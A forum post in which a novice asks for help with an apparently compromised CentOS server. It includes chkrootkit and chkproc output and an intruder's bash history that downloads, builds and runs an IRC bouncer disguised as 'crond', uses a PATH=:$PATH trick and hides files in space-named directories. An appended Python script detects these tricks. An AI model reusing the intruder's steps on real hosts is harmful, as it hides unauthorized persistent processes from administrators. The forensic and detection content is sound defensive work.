Hacking suspicion, more than certain
Hello!
@noob inside!!
Some clever person (much cleverer than me, given that I know nothing about this) has almost certainly broken into my little Linux server (CentOS 5).
A bit of history:
Chkrootkit added this to its logs:
Code:
Warning: `//root/.bash_history
//home/.bash_history
//var/html/.bash_history' file size is zero
INFECTED (PORTS: 465)
The tty of the following user process(es) were not found
in /var/run/utmp !
! root 3921 tty1 /sbin/mingetty tty1
! root 3922 tty2 /sbin/mingetty tty2
! root 3925 tty3 /sbin/mingetty tty3
! root 3928 tty4 /sbin/mingetty tty4
! root 3929 tty5 /sbin/mingetty tty5
! root 3930 tty6 /sbin/mingetty tty6
! root 13082 pts/1 /bin/bash
clamav has refused to log properly since Friday; alert email:
Code:
/etc/cron.hourly/freshclam:
ERROR: Can't open /var/log/clamav/freshclam.log in append mode (check permissions!).
/etc/cron.hourly/inn-cron-nntpsend:
cannot determine current run level
/etc/cron.hourly/inn-cron-rnews:
cannot determine current run level
/etc/cron.hourly/mcelog:
and a chkrootkit -x lkm gives me:
Quote:
ROOTDIR is `/'
find: WARNING: Hard link count is wrong for /proc/1: this may be a bug in your filesystem driver. Automatically turning on find's -noleaf option. Earlier results may have failed to include directories that should have been searched.
###
### Output of: ./chkproc -v -v -p 3
###
CWD 11859: /
EXE 11859: /usr/local/psa/admin/bin/modules/watchdog/monit
CWD 13185: /var/lib/mysql
EXE 13185: /usr/libexec/mysqld
CWD 13186: /var/lib/mysql
EXE 13186: /usr/libexec/mysqld
CWD 13187: /var/lib/mysql
EXE 13187: /usr/libexec/mysqld
CWD 13188: /var/lib/mysql
EXE 13188: /usr/libexec/mysqld
CWD 13193: /var/lib/mysql
EXE 13193: /usr/libexec/mysqld
CWD 13194: /var/lib/mysql
EXE 13194: /usr/libexec/mysqld
CWD 13195: /var/lib/mysql
EXE 13195: /usr/libexec/mysqld
CWD 13196: /var/lib/mysql
EXE 13196: /usr/libexec/mysqld
CWD 13240: /home/dumas/ /sbnc
EXE 13240: /home/dumas/ /sbnc/bin/sbnc
CWD 13771: /var/lib/mysql
EXE 13771: /usr/libexec/mysqld
CWD 28578: /var/named/run-root/var
EXE 28578: /usr/sbin/named
CWD 28579: /var/named/run-root/var
EXE 28579: /usr/sbin/named
CWD 28580: /var/named/run-root/var
EXE 28580: /usr/sbin/named
CWD 28581: /var/named/run-root/var
EXE 28581: /usr/sbin/named
CWD 28962: /
EXE 28962: /usr/sbin/automount
CWD 28963: /
EXE 28963: /usr/sbin/automount
CWD 28966: /
EXE 28966: /usr/sbin/automount
CWD 28969: /
EXE 28969: /usr/sbin/automount
CWD 29323: /
EXE 29323: /sbin/auditd
CWD 29325: /
EXE 29325: /sbin/audispd
CWD 29816: /
EXE 29816: /usr/sbin/pcscd
This Dumas has just appeared on my system in /home/dumas/ with this .bash_history:
Code:
cd /dev/shm
w
ps x
cd /dev/shm
ls -as
cd sbnc-1.3beta6
cd src
ls -as
mv cron sbnc
./sbnc
./sbnc
ps x
kill -9 30017
./sbnc
kill -9 30017
ps x
kill -9 30110
mv sbnc crond
PATH=:$PATH
crond
ps x
cd /dev/shm
ls -as
cd " . "
ls -as
cd sbnc-1.3beta6
make
cd /home
las -as
ls -as
cd /dev/shm
ls -as
wget http://www.shroudbnc.info/redmine/attachments/download/28/sbnc-1.3beta6.tar.gz
tar zxvf sbnc-1.3beta6.tar.gz
cd sbnc-1.3beta6
ls -sd
ls -as
./configure
make
make install
ls -as
cd src
ls -as
ps x
mv sbnc cron
PATH=:$PATH
crond
ps x
kill -9 30124
cd /dev/shm
ls -as
rm -rf *
cd
wget http://www.shroudbnc.info/redmine/attachments/download/28/sbnc-1.3beta6.tar.gz
tar zxvf sbnc-1.3beta6.tar.gz
rm -rf sbnc-1.3beta6.tar.gz
cd sbnc-1.3beta6
ls -as
./configure
./configure*
chmod +x *
make
./make insall
/make install
./make
make install
ls -as
cd php
ls -as
cd src
ls -as
cd ..
cd src
ls .as
ls -as
./sbnc
ps x
kill -9 11764
cd ..
ls -as
cd ..
ls -as
cd sbnc
ls -as
./sbnc
./sbnc
ls -as
ps x
kill -9 12718
mv sbnc crond
PATH=:$PATH
crond
w
last
ps x
kill -9 30461 16431 3356
help!!! I'm in a cold sweat here...
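The chkproc output and the bash history above show the two tricks worth checking for on any box: a binary renamed to a daemon name (`sbnc` moved to `crond`, then started through `PATH=:$PATH`, whose empty leading entry makes the shell resolve `crond` from the current directory) and a directory whose name is a single space (`/home/dumas/ /sbnc`) so that it blends into `ls` output. The following Python script is an added example, not part of the post or of chkrootkit: it parses `CWD pid: path` / `EXE pid: path` lines in the chkproc format, then flags any process whose executable runs from a writable location, carries a system-daemon name while living outside the system directories, or sits behind a whitespace-padded path component. The sample lines are copied from the post, except the `40001` entry, which is constructed to show the renamed-daemon case; the trusted and writable prefixes and the daemon-name list are assumptions for a CentOS 5 host.

```python
"""Flag processes hiding in writable dirs, behind daemon names, or behind
whitespace-only path components, from chkproc-style CWD/EXE lines.
Added example; rules and prefixes are assumptions, not chkrootkit's logic."""
import os
import re
from typing import Dict, List

# Constructed sample: lines copied from the post's "chkproc -v -v" output,
# plus pid 40001, which is made up to show a daemon-name impersonation.
SAMPLE_CHKPROC = """\
CWD 11859: /
EXE 11859: /usr/local/psa/admin/bin/modules/watchdog/monit
CWD 13185: /var/lib/mysql
EXE 13185: /usr/libexec/mysqld
CWD 13240: /home/dumas/ /sbnc
EXE 13240: /home/dumas/ /sbnc/bin/sbnc
CWD 28578: /var/named/run-root/var
EXE 28578: /usr/sbin/named
CWD 40001: /home/dumas/sbnc
EXE 40001: /home/dumas/sbnc/crond
"""

# Assumption: where legitimate daemons live on this CentOS 5 box.
TRUSTED_PREFIXES = ("/sbin/", "/usr/sbin/", "/bin/", "/usr/bin/",
                    "/usr/libexec/", "/usr/local/psa/")
# Writable locations a long-running daemon has no business executing from.
WRITABLE_PREFIXES = ("/dev/shm/", "/tmp/", "/var/tmp/", "/home/")
# Daemon names worth protecting; "crond"/"cron" are the ones the history impersonates.
DAEMON_NAMES = {"crond", "cron", "sshd", "httpd", "named", "mysqld"}

LINE_RE = re.compile(r"^(CWD|EXE) (\d+): (.*)$")


def parse_chkproc(text: str) -> Dict[int, Dict[str, str]]:
    """Group chkproc lines by pid: {pid: {"cwd": ..., "exe": ...}}."""
    procs: Dict[int, Dict[str, str]] = {}
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # ignore banners and other non-matching output
        kind, pid, path = m.group(1).lower(), int(m.group(2)), m.group(3)
        procs.setdefault(pid, {})[kind] = path
    return procs


def hidden_components(path: str) -> List[str]:
    """Path components that are whitespace-only or padded with whitespace,
    like the ' ' directory and the ' . ' name seen in the bash history."""
    return [c for c in path.split("/") if c and (c.strip() == "" or c != c.strip())]


def suspicious_reasons(info: Dict[str, str]) -> List[str]:
    """Return human-readable reasons a process looks wrong; empty list if clean."""
    exe = info.get("exe", "")
    cwd = info.get("cwd", "")
    reasons: List[str] = []
    if exe.startswith(WRITABLE_PREFIXES):
        reasons.append("executable runs from a writable location")
    name = os.path.basename(exe)
    if name in DAEMON_NAMES and not exe.startswith(TRUSTED_PREFIXES):
        reasons.append(f"daemon name {name!r} but executable outside system directories")
    for p in (exe, cwd):
        if hidden_components(p):
            reasons.append(f"whitespace-hidden path component in {p!r}")
            break
    return reasons


def scan(text: str) -> Dict[int, List[str]]:
    """Map each suspicious pid to its list of reasons."""
    findings: Dict[int, List[str]] = {}
    for pid, info in parse_chkproc(text).items():
        reasons = suspicious_reasons(info)
        if reasons:
            findings[pid] = reasons
    return findings


if __name__ == "__main__":
    for pid, reasons in sorted(scan(SAMPLE_CHKPROC).items()):
        print(pid, "->", "; ".join(reasons))
```

On a live host the same checks run against the real `/proc`: resolve `/proc/<pid>/exe` and `/proc/<pid>/cwd` with `os.readlink` and feed them to `suspicious_reasons`. The whitespace check is the cheap one to keep around, since a directory named `" "` or `" . "` is invisible in a casual `ls` but trivial to spot programmatically.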